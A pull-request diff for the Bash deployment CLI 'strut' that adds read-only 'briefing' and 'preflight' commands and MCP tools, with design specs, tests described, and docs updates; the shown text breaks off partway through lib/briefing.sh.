### PR TITLE
feat(mcp): add briefing and preflight synthesis tools

### DIFF
--- a/.kiro/skills/strut/SKILL.md
+++ b/.kiro/skills/strut/SKILL.md
@@ -30,6 +30,8 @@ strut <stack> rollback --env prod         # restore previous deploy snapshot
 # Inspect
 strut <stack> status  --env prod          # container status
 strut <stack> health  --env prod --json   # health checks
+strut <stack> briefing --env prod         # one-call situation report: posture + prioritized actions
+strut <stack> preflight --env prod        # deploy go/no-go verdict (GO/CAUTION/NO-GO) before releasing
 strut <stack> logs <service> --follow --env prod
 strut <stack> diff    --env prod          # preview pending changes vs VPS
 strut fleet status                        # git sync state across all [hosts]
@@ -74,6 +76,7 @@ Load the relevant reference file for detailed, step-by-step procedures:
 3. **Use `release` for VPS** (runs remotely over SSH), not `deploy` (runs locally).
 4. **Make changes in git, not on the VPS** — let deployments propagate; drift detection catches manual edits.
 5. **Health checks gate success** — driven by `services.conf`; keep it current.
+6. **Assess before you act** — run `briefing` to triage a stack in one call, and `preflight` for a go/no-go before any release. Both are read-only aggregations of the checks above (`--json` for machine parsing).
 
 ## Environment Files
 

--- a/.kiro/specs/operational-briefing/design.md
+++ b/.kiro/specs/operational-briefing/design.md
@@ -1,0 +1,243 @@
+# Operational Briefing - Design
+
+## Overview
+
+Two new per-stack commands, `briefing` and `preflight`, are built on a shared
+aggregation library. The core idea is deliberately small: **do not add new
+detection logic.** Every fact either command reports already comes from an
+existing strut check. The new code (1) runs those checks in isolation, (2)
+normalizes each into a common four-level severity, and (3) synthesizes — a
+worst-wins posture for `briefing`, a release-safety verdict for `preflight`.
+
+The synthesis stops at structured data. When an AI agent calls the MCP tool it
+receives the normalized severities, findings, and remediation commands, and
+writes the prose itself. This keeps strut dependency-free (no local LLM bolted
+onto a Bash CLI) while still making the integration produce something no single
+existing tool could: a one-call operational answer.
+
+```
+                    ┌────────────────────────────┐
+  strut_briefing ──▶│ strut <stack> briefing      │──┐
+  (MCP, read-only)  └────────────────────────────┘  │
+                                                     ▼
+                    ┌────────────────────────────┐  lib/briefing.sh
+  strut_preflight ─▶│ strut <stack> preflight     │──┤  (shared normalizers,
+  (MCP, read-only)  └────────────────────────────┘  │   severity ranking,
+                                                     │   error-isolated runner)
+                                                     ▼
+                         re-invokes existing checks via "$STRUT_BIN":
+                         health --json · drift detect · drift images --json ·
+                         diff --json · backup health --json
+                         (health --json carries per-container state, so there is
+                          no separate status dimension — cmd_status has no JSON)
+```
+
+## Architecture
+
+### Why re-invoke the strut binary per check
+
+Each dimension is gathered by shelling out to the strut entrypoint itself
+(`"$STRUT_BIN" "$stack" <check> --json`), exactly as the existing MCP layer and
+`cmd_status_all`'s remote path already do. This is chosen over calling the
+`cmd_*` functions in-process for three reasons:
+
+1. **Error isolation (Requirement 1.3).** Each check runs in its own process
+   with its own `set -euo pipefail`. A check that hard-fails, or a stack whose
+   env file is missing a `VPS_HOST`, exits non-zero in the child and cannot
+   abort the parent briefing. The parent captures the child's rc and maps it to
+   `unknown`.
+2. **Local/remote transparency.** Each subcommand already decides whether to
+   run locally or dispatch over SSH. The aggregator inherits that for free and
+   never has to know the topology.
+3. **Consistency.** It mirrors the established pattern in `lib/mcp/tools.sh`
+   and `_status_health_remote`, so there is no new dispatch model to learn.
+
+`STRUT_BIN` resolves to `${STRUT_HOME:-${CLI_ROOT}}/strut`, matching how
+`lib/mcp/tools.sh` resolves it.
+
+### Bounded fan-out and timeouts
+
+The fan-out is a fixed set of six checks (briefing) or four (preflight) — it is
+inherently bounded, not a loop over unbounded input. Each check's worst-case
+latency is bounded by SSH `ConnectTimeout` (already set by `build_ssh_opts`).
+As an additional guard, `_briefing_run` wraps each check in `timeout`/`gtimeout`
+when one is present on the host (per-check cap, default 45s). Using the OS
+`timeout` — rather than a hand-rolled background-PID + `kill` — avoids leaving
+orphaned SSH children or a lingering timer on the fast path. When neither
+`timeout` nor `gtimeout` exists, the check runs directly and relies on SSH's own
+timeout.
+
+## Components and Interfaces
+
+### `lib/briefing.sh` — shared aggregation primitives
+
+```bash
+# _briefing_bin
+#   Echo the absolute path to the strut entrypoint to re-invoke for checks.
+
+# _briefing_run <label> <output_var> <rc_var> -- <strut-args...>
+#   Run "$STRUT_BIN <strut-args...>" with an optional timeout wrapper,
+#   capturing combined stdout+stderr into <output_var> and the exit code into
+#   <rc_var>. NEVER returns non-zero itself (error isolation): a failed or
+#   timed-out check just yields a non-zero <rc_var> for the normalizer to read.
+#   Timeout exit (124) is preserved so the normalizer can label it distinctly.
+
+# Severity constants and ranking:
+#   _briefing_sev_rank <ok|warn|critical|unknown>  -> 0..3 for max-comparison
+#   _briefing_worst <sevA> <sevB>                  -> the higher-ranked severity
+#     Ranking: critical(3) > warn(2) > ok(1) > unknown(0). Posture treats an
+#     all-unknown result as unknown (see _briefing_posture).
+
+# _briefing_json_extract  (stdin -> stdout)
+#   Print from the first line beginning with `{` or `[`, dropping any leading
+#   log/`ok` lines a check may print before its JSON body (e.g. `backup health
+#   --json` prints a "Dashboard data generated" line, then the JSON array).
+
+# Per-dimension normalizers. Each takes the check's captured stdout + rc and
+# echoes: "<severity>\t<one-line summary>". They rely primarily on documented
+# exit codes, falling back to guarded jq parsing of the --json body:
+#   _briefing_norm_health   <out> <rc>   # json .overall_status healthy/degraded/unhealthy (+ container counts); rc 0/1/2 fallback
+#   _briefing_norm_drift    <out> <rc>   # drift detect rc: 0 ok; non-zero+stdout -> critical (drift); non-zero+empty -> unknown (couldn't run)
+#   _briefing_norm_images   <out> <rc>   # json .drifted: 0 ok, >0 warn(stale); no json -> unknown
+#   _briefing_norm_diff     <out> <rc>   # json .has_changes / .has_destructive_changes; no json / rc 2 -> unknown
+#   _briefing_norm_backup   <out> <rc>   # json array of {status}: worst of healthy=ok/warning=warn/degraded|critical=critical; empty -> unknown
+
+# _briefing_posture <sev...>  -> overall posture per Requirement 1.4
+
+# _briefing_remedy <dimension> <stack> <env>  -> the exact remediation command
+#   string for a non-ok dimension (e.g. "strut <stack> drift fix --env <env>").
+```
+
+### `lib/cmd_briefing.sh` — `cmd_briefing`
+
+`--env`/`--json` are consumed by the entrypoint's global flag parser and reach
+the handler as `$CMD_ENV_NAME`/`$CMD_JSON`; the handler additionally scans its
+own `CMD_ARGS` for `--help`. Flow:
+
+1. Resolve `stack` (`$CMD_STACK`), `env` (`${CMD_ENV_NAME:-prod}`), and
+   `json_mode` (`$CMD_JSON` == `--json`, or `OUTPUT_MODE=json`).
+2. For each of the five dimensions: `_briefing_run` the check, then the matching
+   `_briefing_norm_*` to get `(severity, summary)`.
+3. `posture = _briefing_posture` of the five severities.
+4. Build the `actions` list from every non-`ok` dimension, sorted worst-first,
+   each with `_briefing_remedy`.
+5. Emit JSON (via `out_json_*`) or the human report (severity glyphs reusing the
+   `GREEN ✓ / YELLOW ⚠ / RED ✗` convention from `_status_health_glyph`).
+6. Exit 0 if posture `ok`, else non-zero (Requirement 1.8).
+
+### `lib/cmd_preflight.sh` — `cmd_preflight`
+
+Reuses four normalizers (`diff`, `drift`, `health`, `backup`). Verdict logic:
+
+```
+gate NO-GO   if drift == critical              (would clobber VPS changes)
+gate NO-GO   if every gathered signal is unknown / no remote target
+gate CAUTION if health == critical             (deploying onto a broken stack)
+gate CAUTION if diff has_destructive_changes   (data-loss risk)
+gate CAUTION if backup in {warn, critical}     (no recent good backup)
+note         if diff == ok (no changes)        (informational; verdict stays GO)
+else GO
+```
+
+Exit codes: `GO` → 0, `CAUTION` → 1, `NO-GO` → 2 (Requirement 2.8), so
+automation can branch on all three.
+
+### MCP integration (`lib/mcp/tools.sh`, `lib/cmd_mcp.sh`)
+
+- Add two entries to `_mcp_tools_list`:
+  - `strut_briefing` — `{stack (required), env}`
+  - `strut_preflight` — `{stack (required), env}`
+- Add two `case` arms to `_mcp_tools_call`, each using the existing `_mcp_arg`
+  validator for `stack`/`env` and invoking
+  `"$strut_bin" "$stack" briefing|preflight --env "$env" --json`.
+- Both are read-only → add to the `autoApprove` array (the `jq`-built Kiro
+  config) and the two printed "Read-only tools" summaries in `_mcp_cmd_install`.
+
+## Data Models
+
+### `briefing --json`
+
+```json
+{
+  "stack": "web",
+  "env": "prod",
+  "generated_at": "2026-07-17T18:04:11Z",
+  "posture": "warn",
+  "dimensions": [
+    { "name": "health",  "severity": "ok",   "summary": "3/3 containers healthy" },
+    { "name": "drift",   "severity": "ok",   "summary": "config in sync" },
+    { "name": "images",  "severity": "warn", "summary": "1/3 images have stale digests" },
+    { "name": "diff",    "severity": "ok",   "summary": "no pending changes" },
+    { "name": "backups", "severity": "warn", "summary": "backup health warning" }
+  ],
+  "actions": [
+    { "severity": "warn", "dimension": "images",  "summary": "1/3 images have stale digests",
+      "command": "strut web deploy --env prod" },
+    { "severity": "warn", "dimension": "backups", "summary": "backup health degraded (score 74)",
+      "command": "strut web backup all --env prod" }
+  ]
+}
+```
+
+### `preflight --json`
+
+```json
+{
+  "stack": "web",
+  "env": "prod",
+  "generated_at": "2026-07-17T18:05:02Z",
+  "verdict": "NO-GO",
+  "checks": { "diff": "warn", "drift": "critical", "health": "ok", "backups": "ok" },
+  "reasons": [
+    { "severity": "critical", "message": "Config drift detected on the VPS — deploying would overwrite un-committed changes",
+      "command": "strut web drift fix --env prod" },
+    { "severity": "info", "message": "Pending changes are ready to deploy",
+      "command": "strut web deploy --env prod" }
+  ]
+}
+```
+
+## Error Handling
+
+- **Per-check isolation (Requirement 1.3).** `_briefing_run` swallows the
+  child's non-zero exit and hands the rc to the normalizer. A hard failure,
+  a missing env file, or a timeout (rc 124) maps to `unknown` — never aborts.
+- **No `VPS_HOST` / diff hard-error (rc 2).** `diff` returns 2 when there is no
+  remote target or missing files. The `diff` normalizer maps rc 2 to `unknown`;
+  in `preflight`, an all-`unknown` signal set triggers the `NO-GO`-blind gate.
+- **Malformed JSON from a check.** Normalizers guard every `jq` call
+  (`|| echo unknown`) so a parse failure degrades that one dimension to
+  `unknown` rather than crashing the aggregator.
+- **Partial JSON on the main command.** `cmd_briefing`/`cmd_preflight` assemble
+  their own JSON with `out_json_*`; if a normalizer errors it still returns a
+  severity string, so the top-level JSON always closes cleanly.
+
+## Testing Strategy
+
+- **`tests/test_briefing.bats`**
+  - Each normalizer: table-driven cases mapping (rc, json) → expected severity
+    (health 0/1/2, drift 0/non-zero, images drifted 0/>0, diff
+    changes/destructive/rc-2, backup healthy/warning/degraded/critical,
+    status running/down/mixed).
+  - `_briefing_worst` / `_briefing_posture`: worst-wins, all-unknown → unknown,
+    ok-with-unknowns → ok.
+  - Error isolation: a stubbed check that exits 1 yields `unknown` and the
+    other dimensions still report (fake `$STRUT_BIN` in a temp dir, as
+    `test_mcp_tools.bats` does).
+  - JSON shape: `--json` output parses with `jq` and has the documented keys;
+    text mode contains a glyph per dimension.
+  - Exit codes: posture ok → 0, warn/critical/unknown → non-zero.
+- **`tests/test_preflight.bats`**
+  - Verdict matrix: drift-critical → NO-GO; all-unknown → NO-GO; unhealthy /
+    destructive-diff / stale-backup (no NO-GO) → CAUTION; clean → GO.
+  - Exit codes 0 / 1 / 2 for GO / CAUTION / NO-GO.
+  - `reasons` carry a recommended command; `checks` echoes every dimension.
+- **`tests/test_mcp_tools.bats` (extended)**
+  - `strut_briefing` / `strut_preflight`: injection payload in `stack`/`env` is
+    rejected before `strut_bin` runs; a valid `stack` reaches
+    `"$strut_bin" <stack> briefing|preflight --env prod --json`.
+- **Real-project run (not just mocks).** Scaffold a throwaway project, run
+  `strut <stack> briefing` and `preflight` against it end-to-end, confirming
+  graceful degradation to `unknown` where no VPS/Docker is reachable and that
+  the JSON is well-formed. This is the "must be a working project, not a
+  mockup" gate.

--- a/.kiro/specs/operational-briefing/requirements.md
+++ b/.kiro/specs/operational-briefing/requirements.md
@@ -1,0 +1,147 @@
+# Operational Briefing - Requirements
+
+## Introduction
+
+strut already exposes thirteen MCP tools, but each one is a thin 1:1 wrapper
+over a single `strut` subcommand (`strut_status` → `status`, `strut_health` →
+`health`, and so on). An AI agent that wants a real answer to "how is my
+production stack doing?" or "is it safe to deploy right now?" has to call five
+or six tools, hold the raw output of each in context, and reconcile them
+itself — reconstructing operator judgement from scratch on every question.
+
+This feature adds two **synthesis** capabilities that fuse the existing
+read-only checks into a single situational answer:
+
+- **`briefing`** — a situation report. One call fans out every read-only check
+  for a stack (containers, health, config drift, image staleness, pending
+  diff, backup health), normalizes each into a common severity, computes an
+  overall posture, and returns a prioritized list of what needs attention with
+  the exact remediation command for each finding.
+- **`preflight`** — a deploy go/no-go. It reuses the deploy-relevant subset of
+  those checks and applies release-safety logic to return a single verdict
+  (`GO` / `CAUTION` / `NO-GO`) with the reasons behind it and the pre-steps a
+  human should take first.
+
+Both are exposed as real `strut <stack> <command>` CLI commands (so they are
+independently testable, scriptable, and useful outside an IDE) and as
+read-only MCP tools (`strut_briefing`, `strut_preflight`). Neither introduces a
+new external dependency or any new detection logic — they aggregate checks
+strut already performs, add one normalization/scoring pass, and let the calling
+agent narrate from the structured result.
+
+## Requirements
+
+### Requirement 1: Situation report aggregation (`briefing`)
+
+**User Story:** As an operator (or an AI agent acting for one), I want a single
+command that summarizes every dimension of a stack's operational health, so
+that I can understand its state without running six separate checks and
+reconciling them by hand.
+
+#### Acceptance Criteria
+
+1. WHEN `strut <stack> briefing` runs THEN the system SHALL collect results for
+   each of these dimensions: health (which includes per-container running
+   state), config drift, image staleness, pending diff, and backup health.
+   > Refinement (during implementation): an early draft listed "containers" as
+   > a separate dimension sourced from `status --json`, but `cmd_status` does
+   > not emit structured JSON (it prints `docker compose ps`). `health --json`
+   > already reports each container as a check with `overall_status`, so
+   > container state is folded into the health dimension rather than derived
+   > from an unreliable second source. Five dimensions, not six.
+2. WHEN a dimension's underlying check succeeds THEN the system SHALL normalize
+   it into exactly one severity: `ok`, `warn`, `critical`, or `unknown`.
+3. WHEN one dimension's check fails, errors, or times out THEN the system SHALL
+   record that dimension as `unknown` and STILL report every other dimension —
+   one failing sub-check SHALL NOT blank out its siblings.
+4. WHEN all dimensions are collected THEN the system SHALL compute an overall
+   posture as the worst observed severity, where `critical` > `warn` > `ok`,
+   and `unknown` only becomes the posture when no dimension reached `ok` or
+   worse.
+5. WHEN a dimension is worse than `ok` THEN the system SHALL include it in a
+   prioritized `actions` list (most severe first), each carrying a
+   human-readable summary and the exact `strut` command that remediates it.
+6. WHEN `--json` is passed THEN the system SHALL emit a single structured JSON
+   object with `stack`, `env`, `generated_at`, `posture`, a `dimensions` array,
+   and an `actions` array, and SHALL emit nothing else on stdout.
+7. WHEN `--json` is NOT passed THEN the system SHALL render a human-readable
+   report with per-dimension severity glyphs, honoring `NO_COLOR` and non-TTY
+   output the same way the rest of strut does.
+8. WHEN the posture is `ok` THEN the command SHALL exit 0; WHEN the posture is
+   `warn`, `critical`, or `unknown` THEN it SHALL exit non-zero, so CI and
+   scripts can gate on it.
+
+### Requirement 2: Deploy go/no-go (`preflight`)
+
+**User Story:** As an operator about to release, I want one command that tells
+me whether it is safe to deploy right now and why, so that I do not clobber
+un-reconciled drift, deploy onto a broken stack, or ship without a recent
+backup.
+
+#### Acceptance Criteria
+
+1. WHEN `strut <stack> preflight` runs THEN the system SHALL evaluate the
+   deploy-safety dimensions: pending diff, config drift, current health, and
+   backup freshness.
+2. IF config drift is detected THEN the verdict SHALL be `NO-GO`, because a
+   deploy would overwrite un-committed changes on the VPS.
+3. IF the required signals cannot be gathered at all (e.g. no remote target
+   configured, all checks `unknown`) THEN the verdict SHALL be `NO-GO`, because
+   deploying blind is unsafe.
+4. IF the stack is currently unhealthy, OR the pending diff is destructive, OR
+   backups are stale/failing, AND no `NO-GO` condition holds THEN the verdict
+   SHALL be `CAUTION` with the specific reason(s) listed.
+5. WHEN no `NO-GO` or `CAUTION` condition holds THEN the verdict SHALL be `GO`.
+6. WHEN there are no pending changes to deploy THEN the system SHALL surface
+   that as an informational reason (it does not by itself change a `GO`).
+   Likewise, WHEN health is `degraded` (milder than unhealthy) THEN the system
+   SHALL surface it as an informational reason without, on its own, downgrading
+   a `GO` — a deploy often restores a degraded stack.
+7. WHEN `--json` is passed THEN the system SHALL emit a structured object with
+   `stack`, `env`, `generated_at`, `verdict`, a `reasons` array (each with a
+   severity, message, and recommended command), and a `checks` object echoing
+   each evaluated dimension's severity.
+8. WHEN the verdict is `GO` THEN the command SHALL exit 0; `CAUTION` SHALL exit
+   a distinct non-zero code from `NO-GO`, so automation can branch on the three
+   outcomes.
+
+### Requirement 3: MCP exposure (read-only)
+
+**User Story:** As an AI agent connected to strut over MCP, I want `briefing`
+and `preflight` available as tools, so that I can answer high-level operational
+questions in one call.
+
+#### Acceptance Criteria
+
+1. WHEN an MCP client lists tools THEN `strut_briefing` and `strut_preflight`
+   SHALL appear with an input schema requiring `stack` and optionally accepting
+   `env`.
+2. WHEN either tool is called THEN its arguments SHALL pass through the same
+   identifier validation as every other strut MCP tool (rejecting shell
+   metacharacters) BEFORE `strut` is invoked.
+3. WHEN either tool is called with a valid `stack` THEN it SHALL invoke the
+   corresponding `strut <stack> <command> --json` and return the result as an
+   MCP text content block.
+4. BECAUSE both tools are strictly read-only (they run no state-changing
+   operations) THEN they SHALL be added to the auto-approve list alongside the
+   other read-only tools, and documented as such.
+
+### Requirement 4: Consistency and no regressions
+
+**User Story:** As a maintainer, I want the new commands to follow strut's
+existing conventions and not break anything, so that they read as native.
+
+#### Acceptance Criteria
+
+1. WHEN the new lib files are added THEN they SHALL start with
+   `set -euo pipefail`, use the shared `out_json_*`/log/color helpers, and be
+   sourced by the `strut` entrypoint in the command-handler block.
+2. WHEN the new commands are added to dispatch THEN they SHALL also appear in
+   usage/help text, shell completions (bash + zsh), and the README command
+   surface.
+3. WHEN the MCP tool count or tool list is stated in any doc surface (README,
+   install output, skill references) THEN every such surface SHALL be updated
+   consistently.
+4. WHEN the full `bats` suite and `shellcheck` run THEN they SHALL pass,
+   including new tests covering the normalization, posture/verdict logic, error
+   isolation, and MCP argument validation for both tools.

--- a/.kiro/specs/operational-briefing/tasks.md
+++ b/.kiro/specs/operational-briefing/tasks.md
@@ -1,0 +1,112 @@
+# Operational Briefing - Implementation Plan
+
+Tasks are unchecked at spec time and checked off as each is implemented and
+verified. Discovered fixes are appended to the relevant task with their own
+`_Requirements:_` line, so the spec records what actually happened (including
+bugs found during live testing) rather than pretending the design was perfect.
+
+- [x] 1. Shared aggregation library `lib/briefing.sh`
+  - [x] 1.1 `_briefing_bin` + `_briefing_run` (error-isolated runner, optional
+        `timeout`/`gtimeout` wrapper, preserves rc incl. 124)
+    - _Requirements: 1.3, and design "Bounded fan-out and timeouts"_
+  - [x] 1.2 Severity ranking helpers `_briefing_sev_rank`, `_briefing_worst`,
+        `_briefing_posture`
+    - _Requirements: 1.2, 1.4_
+  - [x] 1.3 Per-dimension normalizers (health, drift, images, diff, backup)
+        mapping (rc, json) → severity + summary
+    - _Requirements: 1.1, 1.2, and Error Handling (guarded jq)_
+    - [x] 1.3a FIX (found in unit smoke test): the diff normalizer used
+          `.has_changes // empty`, but jq's `//` treats a literal `false` as
+          empty — so a clean "no changes" diff was misread as `unknown`. Switched
+          to an explicit `has("has_changes")` presence check + `tostring`, and
+          made the severity a strict `case` on `true`/`false`/other so empty
+          stdin (rc 2, no remote) correctly yields `unknown`.
+    - _Requirements: 1.2, Error Handling_
+    - [x] 1.3b Added `_briefing_json_extract` to strip a leading log/`ok` line
+          before a JSON body (`backup health --json` prints "Dashboard data
+          generated" before its array).
+    - _Requirements: Error Handling (guarded parsing)_
+  - [x] 1.4 `_briefing_remedy` — remediation command per dimension
+    - _Requirements: 1.5_
+
+- [x] 2. `lib/cmd_briefing.sh` — situation report
+  - [x] 2.1 Reads `$CMD_STACK`/`$CMD_ENV_NAME`/`$CMD_JSON`; scans args for `--help`
+    - _Requirements: 4.1_
+  - [x] 2.2 Fan out five dimensions, normalize, compute posture
+    - _Requirements: 1.1, 1.2, 1.3, 1.4_
+  - [x] 2.3 Build prioritized `actions` list (worst-first, with commands)
+    - _Requirements: 1.5_
+    - [x] 2.3a REFINEMENT (found in real-project run): actions now include only
+          dimensions strictly worse than ok (warn/critical). `unknown` ranks
+          below ok — it means "couldn't assess", not a defect — so proposing a
+          fix command (e.g. `drift fix` for a drift check that merely couldn't
+          run) was misleading. Unknowns still appear in the dimensions table.
+    - _Requirements: 1.5_
+  - [x] 2.4 JSON output (`out_json_*`) and human report (glyphs, NO_COLOR-safe)
+    - _Requirements: 1.6, 1.7_
+  - [x] 2.5 Exit code reflects posture
+    - _Requirements: 1.8_
+
+- [x] 3. `lib/cmd_preflight.sh` — deploy go/no-go
+  - [x] 3.1 Fan out diff/drift/health/backup, normalize
+    - _Requirements: 2.1_
+  - [x] 3.2 Verdict logic (NO-GO/CAUTION/GO gates) + reasons with commands
+    - _Requirements: 2.2, 2.3, 2.4, 2.5, 2.6_
+  - [x] 3.3 JSON + human output; exit codes 0/1/2
+    - _Requirements: 2.7, 2.8_
+    - [x] 3.3a FIX: `checks` is a keyed nested object, but the output API has no
+          "open keyed object" helper — assembled it with `out_json_field_raw`
+          from the fixed-vocabulary severities (no escaping needed).
+    - _Requirements: 2.7_
+    - [x] 3.3b REVIEW tightening: degraded (warn) health was only visible in the
+          `checks` object — preflight now also emits an `info` reason for it, so
+          a non-ok health state is always explained in `reasons`. Verdict is
+          unchanged (still GO — degraded doesn't block).
+    - _Requirements: 2.6 (extended)_
+
+- [x] 4. Entrypoint wiring
+  - [x] 4.1 Source `lib/briefing.sh`, `lib/cmd_briefing.sh`, `lib/cmd_preflight.sh`
+    - _Requirements: 4.1_
+  - [x] 4.2 Add `briefing)` and `preflight)` to per-stack dispatch
+    - _Requirements: 4.1_
+  - [x] 4.3 Usage/help text for both commands (+ `usage()` command list)
+    - _Requirements: 4.2_
+
+- [x] 5. MCP exposure
+  - [x] 5.1 Add `strut_briefing` + `strut_preflight` to `_mcp_tools_list` (15 tools)
+    - _Requirements: 3.1_
+  - [x] 5.2 Add `case` arms to `_mcp_tools_call` using `_mcp_arg` validation
+    - _Requirements: 3.2, 3.3_
+  - [x] 5.3 Add both to auto-approve list + printed summaries in cmd_mcp.sh
+    - _Requirements: 3.4_
+
+- [x] 6. Tests
+  - [x] 6.1 `tests/test_briefing.bats` (31 tests: normalizers, posture, isolation,
+        JSON, exit, unknown-not-actioned)
+    - _Requirements: 1.2, 1.3, 1.4, 1.6, 1.8, 4.4_
+  - [x] 6.2 `tests/test_preflight.bats` (13 tests: verdict matrix, exit codes, reasons)
+    - _Requirements: 2.2–2.8, 4.4_
+  - [x] 6.3 Extend `tests/test_mcp_tools.bats` (both tools: injection + pass-through)
+    - _Requirements: 3.2, 3.3, 4.4_
+
+- [x] 7. Docs + completions + skill
+  - [x] 7.1 README: command table + examples
+    - _Requirements: 4.2, 4.3_
+  - [x] 7.2 `completions/bash.sh` + `zsh.sh` + `fish.fish` per-stack commands
+        (required by the completions-sync test)
+    - _Requirements: 4.2_
+  - [x] 7.3 `.kiro/skills/strut/SKILL.md` (Inspect list + core principle)
+    - _Requirements: 4.3_
+
+- [x] 8. Verification + audit
+  - [x] 8.1 `shellcheck` green on all new/modified files; syntax + completions-sync
+        tests pass
+    - _Requirements: 4.4_
+  - [x] 8.2 Real scaffolded-project run of briefing + preflight (init + scaffold,
+        no VPS): briefing → posture critical/unknowns, valid JSON, exit 1;
+        preflight → NO-GO (blind), exit 2. Confirms graceful degradation, not a
+        mockup.
+    - _Requirements: design "Testing Strategy — Real-project run"_
+  - [x] 8.3 Authorship (human) + whole-diff secrets scan clean; no
+        `.kiro/settings/mcp.json` in repo; no AI-attribution in new files
+    - _Requirements: challenge brief (authorship + secrets audit)_

--- a/README.md
+++ b/README.md
@@ -130,6 +130,8 @@ strut <stack> <command> [--env <env>] [options]
 | `deploy` | Deploy stack containers |
 | `stop` | Stop running containers |
 | `health` | Run health checks |
+| `briefing` | One-call situation report — posture + prioritized actions across every read-only check |
+| `preflight` | Deploy go/no-go verdict (GO / CAUTION / NO-GO) with reasons |
 | `logs` | View service logs |
 | `backup` / `restore` | Database backup and restore |
 | `db:pull` / `db:push` | Sync databases between VPS and local |
@@ -154,6 +156,8 @@ See [CLI Reference](https://github.com/gfargo/strut/wiki/CLI-Reference) for the 
 ```bash
 strut my-app release --env prod                              # Production release
 strut my-app health --env prod --json                        # Health checks
+strut my-app briefing --env prod                              # One-call situation report (posture + actions)
+strut my-app preflight --env prod                             # Deploy go/no-go verdict before releasing
 strut my-app logs api --follow --env prod                    # Follow logs
 strut my-app backup postgres --env prod                      # Backup database
 strut my-app restore backups/postgres-20260701.sql --env prod --dry-run  # Rehearse a restore

--- a/completions/bash.sh
+++ b/completions/bash.sh
@@ -69,7 +69,7 @@ _strut_completions() {
   cword=$COMP_CWORD
 
   local top_cmds="init list scaffold upgrade doctor status-all dashboard posture group monitoring audit audit:list audit:diff audit:generate migrate migrate:status notify sync fleet webhook mcp skills help completions --version -v --help -h"
-  local per_stack_cmds="update release deploy rebuild ship stop diff lock health logs logs:download logs:rotate backup drift migrate restore db:pull db:push db:schema shell exec remote:init adopt provision ssh:keygen ci:init cert:renew cert:status init-secrets secrets status volumes prune local prod staging dev debug keys validate rollback history domain --help"
+  local per_stack_cmds="update release deploy rebuild ship stop diff lock health logs logs:download logs:rotate backup drift migrate restore db:pull db:push db:schema shell exec remote:init adopt provision ssh:keygen ci:init cert:renew cert:status init-secrets secrets status briefing preflight volumes prune local prod staging dev debug keys validate rollback history domain --help"
   local profiles="messaging ui full"
 
   # Flag-value completions — operate on prev regardless of position

--- a/completions/fish.fish
+++ b/completions/fish.fish
@@ -61,7 +61,7 @@ function __strut_tok
 end
 
 set -l top_cmds init list scaffold upgrade doctor status-all dashboard posture group monitoring audit audit:list audit:diff audit:generate migrate migrate:status notify sync fleet webhook mcp skills help completions
-set -l per_stack_cmds update release deploy rebuild ship stop diff lock health logs logs:download logs:rotate backup drift migrate restore db:pull db:push db:schema shell exec remote:init adopt provision ssh:keygen ci:init cert:renew cert:status init-secrets secrets status volumes prune local prod staging dev debug keys validate rollback history domain
+set -l per_stack_cmds update release deploy rebuild ship stop diff lock health logs logs:download logs:rotate backup drift migrate restore db:pull db:push db:schema shell exec remote:init adopt provision ssh:keygen ci:init cert:renew cert:status init-secrets secrets status briefing preflight volumes prune local prod staging dev debug keys validate rollback history domain
 
 # Disable file completion by default; re-enable where relevant
 complete -c strut -f

--- a/completions/zsh.sh
+++ b/completions/zsh.sh
@@ -50,7 +50,7 @@ _strut_groups() {
 _strut() {
   local -a top_cmds per_stack_cmds profiles
   top_cmds=(init list scaffold upgrade doctor status-all dashboard posture group monitoring audit audit:list audit:diff audit:generate migrate migrate:status notify sync fleet webhook mcp skills help completions --version --help)
-  per_stack_cmds=(update release deploy rebuild ship stop diff lock health logs logs:download logs:rotate backup drift migrate restore db:pull db:push db:schema shell exec remote:init adopt provision ssh:keygen ci:init cert:renew cert:status init-secrets secrets status volumes prune local prod staging dev debug keys validate rollback history domain --help)
+  per_stack_cmds=(update release deploy rebuild ship stop diff lock health logs logs:download logs:rotate backup drift migrate restore db:pull db:push db:schema shell exec remote:init adopt provision ssh:keygen ci:init cert:renew cert:status init-secrets secrets status briefing preflight volumes prune local prod staging dev debug keys validate rollback history domain --help)
   profiles=(messaging ui full)
 
   local -a words_arr

--- a/lib/briefing.sh
+++ b/lib/briefing.sh
@@ -1,0 +1,247 @@
+#!/usr/bin/env bash
+# ==================================================
+# lib/briefing.sh — shared aggregation primitives for briefing + preflight
+# ==================================================
+# Neither `briefing` nor `preflight` adds new detection logic. Both re-invoke
+# strut's existing read-only checks (health, drift, drift images, diff, backup
+# health), normalize each into a common four-level severity, and synthesize —
+# a worst-wins posture (briefing) or a release-safety verdict (preflight).
+#
+# Design notes:
+#   - Each check runs in its OWN strut process (see _briefing_run) so a
+#     hard-failing check, a missing env file, or a timeout degrades that one
+#     dimension to `unknown` instead of aborting the whole aggregation.
+#   - Normalizers lean on each command's documented exit code, with guarded jq
+#     parsing of the --json body as a richer secondary signal. Every jq call is
+#     guarded so malformed JSON degrades to `unknown`, never a crash.
+
+set -euo pipefail
+
+# ── Severity model ────────────────────────────────────────────────────────────
+# Four levels, ranked for max-comparison:  critical(3) > warn(2) > ok(1) > unknown(0)
+
+# _briefing_sev_rank <severity> — numeric rank for worst-wins comparison
+_briefing_sev_rank() {
+  case "$1" in
+    critical) echo 3 ;;
+    warn)     echo 2 ;;
+    ok)       echo 1 ;;
+    *)        echo 0 ;;  # unknown
+  esac
+}
+
+# _briefing_worst <sevA> <sevB> — the higher-ranked of two severities
+_briefing_worst() {
+  local a="$1" b="$2"
+  if [ "$(_briefing_sev_rank "$a")" -ge "$(_briefing_sev_rank "$b")" ]; then
+    echo "$a"
+  else
+    echo "$b"
+  fi
+}
+
+# _briefing_posture <sev...> — overall posture across dimensions.
+#
+# Worst-wins among ok/warn/critical. `unknown` never dominates a real signal;
+# the posture only becomes `unknown` when NO dimension reached ok-or-worse
+# (i.e. every dimension was unknown).
+_briefing_posture() {
+  local worst="unknown" sev
+  for sev in "$@"; do
+    worst=$(_briefing_worst "$worst" "$sev")
+  done
+  echo "$worst"
+}
+
+# ── Isolated check runner ─────────────────────────────────────────────────────
+
+# _briefing_bin — absolute path to the strut entrypoint to re-invoke.
+# Matches how lib/mcp/tools.sh resolves the binary.
+_briefing_bin() {
+  local home="${STRUT_HOME:-${CLI_ROOT:-$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)}}"
+  printf '%s' "$home/strut"
+}
+
+# _briefing_run <strut-args...> — run one check in an isolated strut process.
+#
+# Captures stdout only (stderr is dropped so log/warn noise can't corrupt a
